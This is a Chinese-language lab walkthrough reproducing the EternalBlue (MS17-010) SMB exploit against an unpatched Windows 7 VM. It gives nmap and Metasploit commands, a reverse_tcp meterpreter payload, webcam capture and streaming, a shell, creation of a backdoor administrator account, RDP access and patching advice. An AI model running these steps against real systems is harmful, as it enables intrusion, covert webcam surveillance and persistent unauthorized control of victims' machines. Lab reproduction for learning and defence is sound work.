永恒之蓝漏洞复现(MS17-010)
永恒之蓝简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
攻击方式
恶意代码会扫描开放445文件共享端口的Windows 机器, 无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
SMB协议
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
SMB工作原理
建立连接
当SMB协议版本确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求数据报实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后服务器通过发送一个SesssetupX请应答数据报来允许或拒绝本次连接。
访问共享资源
当客户端和服务器完成了协商和认证之后,它会发送一个Tcon或SMB TconX数据报并列出它想访问网络资源的名称,之后服务器会发送一个SMB TconX应答数据报以表示此次连接是否被接受或拒绝。
断开连接
连接到相应资源,SMB客户端能够open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
实验环境
系统:windows 7 旗舰版 (未装补丁、靶机)、kali (攻击主机)
网络:同一网络
设置:windows 7 关闭防火墙
漏洞复现
操作全在kali上操作
子网端口扫描
root@kali911:~# nmap 192.168.30.*
发现靶机IP 192.168.30.153 开启445端口
查看是否开启postgresql数据库服务
root@kali911:~# service postgresql status
发现没有启动,所以我们需要启动
root@kali911:~# service postgresql start
root@kali911:~# service postgresql status
启动msf ,图画是随机的
root@kali911:~# msfconsole
查看漏洞模块
msf5 > search ms17-010
可以看到有auxiliary(辅助)模块和exploit(攻击)模块
我们先试试辅助模块
msf5 > use auxiliary/scanner/smb/smb_ms17_010
查看配置选项参数
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
RHOSTS是需要扫描的主机
设置攻击目标(靶机)
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.30.153
查看靶机系统
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
得出系统为 windows 7 旗舰版 64位
使用攻击模块
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标(靶机)
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.30.153
设置监听主机 (kali)
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhosts 192.168.30.154
设置攻击载荷
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
进行攻击
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
如果出现
则把之前的 lhosts 改为 lhost
显示靶机信息
meterpreter > sysinfo
对靶机进行截图
meterpreter > screenshot
文件位置为 root 目录
查看是否有摄像头(外设)
meterpreter > webcam_list
发现没有摄像头,要是有摄像头可以使用 webcam_stream 命令打开摄像头,也可以使用 webcam_snap 命令拍照
如果感兴趣也可以实现的,首先我们把笔记本的摄像头转给虚拟机
然后在windows 7下载摄像头插件
https://www.onlinedown.net/soft/613457.htm
安装至windows 7,安装完成会有视频设备,可以打开试试
然后我们就可以去kali中测试了,查看设备
meterpreter > webcam_list
拍照
meterpreter > webcam_snap
开启摄像头监控
meterpreter > webcam_stream
接下来是获取控制台shell
meterpreter > shell
这我们就成功连接至后门,我们可以查看用户
C:\Windows\system32>net user
那我们就创建新的管理员hack, 将hack加入本地管理员组中
C:\Windows\system32>net user hack 123456 /add
C:\Windows\system32>net localgroup administrators hack /add
查看windows 7本地管理员
C:\Windows\system32>net localgroup administrators
远程桌面连接(windows 7 开启远程桌面)
新打开kali终端输入
root@kali911:~# rdesktop 192.168.30.153
点击其他用户,使用我们刚刚设置账户登录
这里就会提示我们
选择是时
在windows 7就会出现远程连接的提示,就暴露我们的操作了
我们只需等待30秒即可成功连接,即拥有管理员权限
踪迹还是会有的
所以我们操作完执行命令关机即可
shutdown -s -t 0
即可直接关机,还有更多的命令就不多讲了
漏洞修复
(1)在线更新:开启Windows Update更新。
(2)安装补丁:微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
参考:
https://blog.csdn.net/n5xxxx__zy/article/details/90705057
https://blog.csdn.net/wwl012345/article/details/89421881?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase
https://www.freebuf.com/column/193681.html
https://blog.csdn.net/qq_41880069/article/details/82908131